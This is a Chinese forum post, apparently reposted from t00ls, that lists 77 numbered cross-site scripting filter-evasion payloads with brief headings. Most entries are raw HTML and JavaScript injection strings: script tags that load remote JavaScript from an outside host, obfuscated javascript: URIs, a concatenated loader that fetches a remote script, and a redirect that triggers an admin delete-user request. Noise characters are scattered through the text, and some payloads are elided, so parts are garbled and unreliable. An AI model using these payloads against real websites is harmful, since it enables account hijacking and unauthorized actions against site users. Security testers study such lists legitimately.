貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
& w2 y$ O" e7 ` n1 z: d(1)普通的XSS JavaScript注入( D. M R9 v9 ]' v/ l) F
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& X/ b6 n% T r# U. h% d(2)IMG标签XSS使用JavaScript命令% O: s! P: z4 s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; E1 Z. P4 R. V
(3)IMG标签无分号无引号# Y0 p9 t. v) V6 ^7 g! f
<IMG SRC=javascript:alert(‘XSS’)>, |' n- A4 N6 f( O% \2 G* _1 q
(4)IMG标签大小写不敏感
$ S; h# N$ q) L9 }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ P- y( @/ ~/ \' M2 D/ v/ y
(5)HTML编码(必须有分号)7 X: o7 [! h$ u; X+ @; n" c9 Q# y" ~
<IMG SRC=javascript:alert(“XSS”)>) Y, Z8 t) r) @* r" u
(6)修正缺陷IMG标签) m; V/ M, j7 U! ?7 z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 G6 b- N: l; D/ Z8 f, ~
* l0 [9 A2 G. }3 `# `# F5 ^; e8 A2 m# S1 S
(7)formCharCode标签(计算器)# Z4 W: w6 r) s" R4 r, q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>! P1 R, ?" I& h- y
(8)UTF-8的Unicode编码(计算器)
6 M8 b0 [8 D/ y0 k<IMG SRC=jav..省略..S')>' D p% _$ [2 c. Q/ k2 E
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* ^1 M: Y. N0 V: ^! @* C2 t1 j<IMG SRC=jav..省略..S')>
. F: a. l5 G7 y+ A" E(10)十六进制编码也是没有分号(计算器)! r0 Y- l. S9 }% ~3 V5 E* |9 b
<IMG SRC=java..省略..XSS')>
. c. W. k; M$ O8 A! |(11)嵌入式标签,将Javascript分开
; b) A* k' |9 K. w- `) {5 }7 k<IMG SRC=”jav ascript:alert(‘XSS’);”>) H H- @ G1 F) y
(12)嵌入式编码标签,将Javascript分开
8 ~' r/ B3 [- j% F( B<IMG SRC=”jav ascript:alert(‘XSS’);”>( ~( v9 E h% o8 W6 T
(13)嵌入式换行符
, [* ?' |4 c F$ |8 D0 ^; D<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 @! v5 L/ G, A(14)嵌入式回车
0 x+ s* u6 f+ y9 [. C# ^<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 P7 p5 b/ A+ W9 _; L* y* j(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 g: V" Y. l c" l/ r* V0 w
<IMG SRC=”javascript:alert(‘XSS‘)”>( m4 S* v+ k6 q2 F$ k, f1 h0 L+ w
(16)解决限制字符(要求同页面)9 N5 J$ I6 {1 `7 t8 Q
<script>z=’document.’</script>2 c2 j% M" ?9 T
<script>z=z+’write(“‘</script># z" [8 j0 |4 F" F- z5 H2 ~7 B
<script>z=z+’<script’</script>
# d) m8 V a# r6 W1 W# E<script>z=z+’ src=ht’</script>
9 t8 w# l' f' q7 v& @<script>z=z+’tp://ww’</script>
# c( v; b4 h. d x. n( w7 _<script>z=z+’w.shell’</script>
* b0 p* R! ?2 J2 b+ v( @9 J( H* F<script>z=z+’.net/1.’</script>
8 ]7 w ~, l5 N5 W( L; F<script>z=z+’js></sc’</script>, i! S' b. f. Q0 Q! U% ]+ P
<script>z=z+’ript>”)’</script>: L* q* K- |, S' K0 k* h1 U( \
<script>eval_r(z)</script>
2 P/ }/ O) z* d7 \0 ?. |3 ?. j! {) d1 h(17)空字符12-7-1 T00LS - Powered by Discuz! Board( o( J1 f* \6 [5 G8 X/ @6 o7 p
https://www.t00ls.net/viewthread ... table&tid=15267 2/6# D( C- l( P. X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! e0 a- B# C8 m' _; ?8 F! Z, _& r(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- q: V' N( O9 @) G
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ J4 s& S! n8 @: Y4 O& Q! M4 y9 {. U
(19)Spaces和meta前的IMG标签
, W* N( U( @. D3 n! i: N5 b<IMG SRC=” javascript:alert(‘XSS’);”> f$ X# D' {8 C( m
(20)Non-alpha-non-digit XSS; }1 D) E" k1 {6 o
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 a0 G; p6 \% t, Z& V
(21)Non-alpha-non-digit XSS to 2
8 N. d5 t: n- j) \<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: V: a; F2 W7 Y, V( ^$ F
(22)Non-alpha-non-digit XSS to 3- z+ P, W! X9 x- X1 M1 L- C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 P; J3 |, a9 R. z
(23)双开括号" E# S2 g, O6 V- V* o5 {% a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>! x' Q4 N0 G& a& t0 A" Y$ u- s
(24)无结束脚本标记(仅火狐等浏览器)
. r7 S" u. [; a5 I/ E8 r$ u3 t<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! [ M4 {4 a# s
(25)无结束脚本标记2; c+ H6 ~. b F# y& d# `! O3 M
<SCRIPT SRC=//3w.org/XSS/xss.js>
0 e5 |1 |% u, Y# A+ y- J(26)半开的HTML/JavaScript XSS
* W& V- H0 ~; L5 R& Y! `<IMG SRC=”javascript:alert(‘XSS’)”
" e) P1 s! n9 m4 k(27)双开角括号, D8 v0 l; T9 b T4 O
<iframe src=http://3w.org/XSS.html <+ _6 o8 J1 ^& H* `0 l0 M5 T
(28)无单引号 双引号 分号3 @! y/ i' _ L: C1 F0 b% q
<SCRIPT>a=/XSS/
1 O0 ?$ Y7 B. g2 k8 Halert(a.source)</SCRIPT>/ O! ^- ]4 ?6 J/ W2 U
(29)换码过滤的JavaScript
* a. g8 `+ V: L) X3 ? f+ }\”;alert(‘XSS’);// R- ?0 ^ M* ]* Q: M
(30)结束Title标签. w1 n/ ?$ U J
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) W' A$ l. z3 Q6 P* \ C+ Z
(31)Input Image, C# S* o( I# p8 @) L
<INPUT SRC=”javascript:alert(‘XSS’);”>) E, l9 g) C3 a' D, O& V3 _( S
(32)BODY Image3 e4 f) ?0 t0 {3 N" [
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 l t. }. i) @: Y(33)BODY标签
% r8 S& w# E$ V% C<BODY(‘XSS’)>
( K1 A# _5 U; f0 a; R(34)IMG Dynsrc
/ \) b. ]" K9 j$ i( ~$ J3 }<IMG DYNSRC=”javascript:alert(‘XSS’)”>, z2 @( I8 j' J1 G: R
(35)IMG Lowsrc
1 I1 s% E4 K- z; b2 ^; t<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- Y& A( S, j5 o! S7 W# N(36)BGSOUND
) M' d+ W8 L& t# ?1 e. \( A {<BGSOUND SRC=”javascript:alert(‘XSS’);”> N) C* G- I$ M6 ^
(37)STYLE sheet, ^! r+ b" U _
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>. p0 \" n7 R+ u+ l% f# s5 M0 ^/ e
(38)远程样式表9 ]0 C, c/ o- C1 ?8 L6 M; I+ X% Q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, x2 }0 r, M2 L9 t' ^0 z* [
(39)List-style-image(列表式)
8 u3 C& u0 y: k+ Y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* A$ c; N/ M D6 r
(40)IMG VBscript8 ^1 a% H. I! M9 I+ ?
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) k- ~' n1 ~1 ^ `1 p' j5 D(41)META链接url
" f2 Q6 d( o5 W% D. s: r/ u4 k- l1 q0 k2 y
5 V0 Z$ T( j& j; ^+ W) y! C<META HTTP-EQUIV=”refresh” CONTENT=”0;6 u+ V6 E5 U" G( \7 `% {" h6 [/ `
URL=http://;URL=javascript:alert(‘XSS’);”>: f/ U, Q1 n& m8 u$ y& n
(42)Iframe# ~4 s; A# W! M$ R
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>8 G) Y2 T* @7 O' \1 t
(43)Frame
6 U+ Z+ [" ~; z; K" s- `% t<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 d/ ?. c0 H3 }+ {
https://www.t00ls.net/viewthread ... table&tid=15267 3/6$ v x4 R; z8 c5 W4 U3 k( d
(44)Table
" J6 O- T8 a5 q, m<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* P/ p9 x' O$ {9 _+ K2 M4 {3 q( ~(45)TD! V n6 r, {. u% D: e# k# P! [
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: I7 _' A9 P4 f
(46)DIV background-image
9 a- c# y2 v7 _' Q% [<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* j: U6 |. \1 K6 w(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-1 {8 g( o1 s4 p
8&13&12288&65279)
- R1 j$ K, ~: U0 d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> L! X1 C; K. h, m9 Z$ J* T4 f
(48)DIV expression
1 h, k! h* K6 x" g" Z+ H; ^<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 V7 z" b7 c e( {* c) B
(49)STYLE属性分拆表达
# ^& D: n2 S) l: U+ B2 U; p% R<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; _* O% U0 Q7 W% v, R(50)匿名STYLE(组成:开角号和一个字母开头)
5 m+ c5 E" w, D/ J, g* q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& }, W% z2 Z+ H9 u1 a(51)STYLE background-image
) |4 l, _' S1 O% _! q9 R* A<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; U# R, `3 }; [' H4 v( S3 [CLASS=XSS></A>$ d+ _/ `2 W$ q$ A$ z. r
(52)IMG STYLE方式
$ O! M Q) @" m$ \. o7 ^exppression(alert(“XSS”))’>4 U9 V' X0 g0 L8 c5 q
(53)STYLE background
1 R" U3 ~, s& `& t S6 ]" I1 e<STYLE><STYLE
7 Q: y3 K6 `! Q/ R- T2 c9 htype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 C, c* I: ~0 X- w
(54)BASE
2 B5 W$ d4 Y! b. L: q9 a<BASE HREF=”javascript:alert(‘XSS’);//”>6 ^. n% s3 \- ]+ c' o4 V
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 b M8 ^& `% h5 y% a3 D1 \<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' S E8 K- }- L/ W1 H( R$ n2 H
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ G3 B; L( e6 I, S; S% `' |a=”get”;
1 a2 w2 p! F7 l' `b=”URL(\”";
5 I" H0 `( H/ O/ X: jc=”javascript:”;
6 U4 ~9 N7 c6 z* X4 R- {d=”alert(‘XSS’);\”)”;: ?( i5 V9 j4 }" R s) H* I8 L
eval_r(a+b+c+d);) H+ {+ g N" s- v- w: X
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 A& o2 l; s- e& O" t0 L
<HTML xmlns:xss>) @1 N( x- V# R7 i- j( ?
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& p$ A/ u+ ~; R: H/ O4 u
<xss:xss>XSS</xss:xss>0 j6 T3 @7 x! @$ T+ c
</HTML>3 F, b0 }7 j+ C6 ^2 A! {! ]
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. J3 [% D- W# ~% Y
<SCRIPT SRC=””></SCRIPT>: Z6 t/ V8 a5 r! q; K% u
(59)IMG嵌入式命令,可执行任意命令
9 G. a" e+ g' K- V<IMG SRC=”http://www.XXX.com/a.php?a=b”>
0 `4 u& p2 Z9 K" d" h+ b9 c& N(60)IMG嵌入式命令(a.jpg在同服务器)
9 x8 K$ _ A" t. aRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 X8 y# z/ \( V; C; X) T
(61)绕符号过滤
1 ` i( v+ Q2 T. }% E# k: k+ ?<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 G$ {3 v" c. J: Y
(62)3 n7 z ?, y! M+ N ?
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Q) k/ R$ q6 T& n+ E( w(63)' s5 E9 E/ c) N# z- [
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>: ^8 b6 Q: t' S' r/ ^5 c6 c
(64)7 O, b q6 z2 G: Q' F
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) t% ?; n; Y9 n" c: \5 k( h# s(65)
5 e" J$ T, P+ |) }2 b<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 x2 d6 N, ~ ?9 m(66)12-7-1 T00LS - Powered by Discuz! Board$ T) O; ], l; d) }
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
9 ?( K1 B& ?, l<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. w" N# g$ i/ w" D
(67)9 P ^! k# f# A- l( z
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
7 |7 r7 U2 n, q; x) \</SCRIPT>5 C! Y X8 k; K0 ~
(68)URL绕行
7 [' {- D; M% z, a+ ^) k* u y5 E, Q<A HREF=”http://127.0.0.1/”>XSS</A>- U: ?& g7 `+ w. P
(69)URL编码 P# |3 d( T1 B2 }- |
<A HREF=”http://3w.org”>XSS</A>1 f, b/ I3 h. {( a# R% @$ g0 E
(70)IP十进制
7 Y, C1 a5 `' \2 h; a Z- o<A HREF=”http://3232235521″>XSS</A>
: u! ^/ {' K V(71)IP十六进制3 _; L E* h0 t" ?1 f5 d1 G) Z
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
3 J) V2 C1 w) m+ M(72)IP八进制
' `. p8 S# Z' {* O! {6 z' [<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# ~, n2 t- J# E1 ]: Q% X i(73)混合编码) A% k( j, ?5 m/ b/ O0 R
<A HREF=”h. z) l- v2 g/ s0 T
tt p://6 6.000146.0×7.147/”">XSS</A>
( U+ s) l( _8 p(74)节省[http:]
& V2 M; Q' t/ Y- q+ d<A HREF=”//www.google.com/”>XSS</A>
" L- R7 `- [0 S6 J7 K(75)节省[www]. B- k: }& ~/ A
<A HREF=”http://google.com/”>XSS</A>
, j8 n9 N! l2 f7 U( ?(76)绝对点绝对DNS
/ u3 R; c9 L$ V: v<A HREF=”http://www.google.com./”>XSS</A>" N, d5 `; j! g& _3 h2 V
(77)javascript链接
+ Z* A& }0 @. k. m! X" J<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> l. l8 G5 r) _% H' H
; Y8 ?: H9 _% E- ~* e8 z7 B0 r原文地址:http://fuzzexp.org/u/0day/?p=14* H% C+ F4 w# L9 h# v9 ~* {
- X+ a. s2 w2 t
|
发表于 2013-4-19 19:22:37
收藏
支持
反对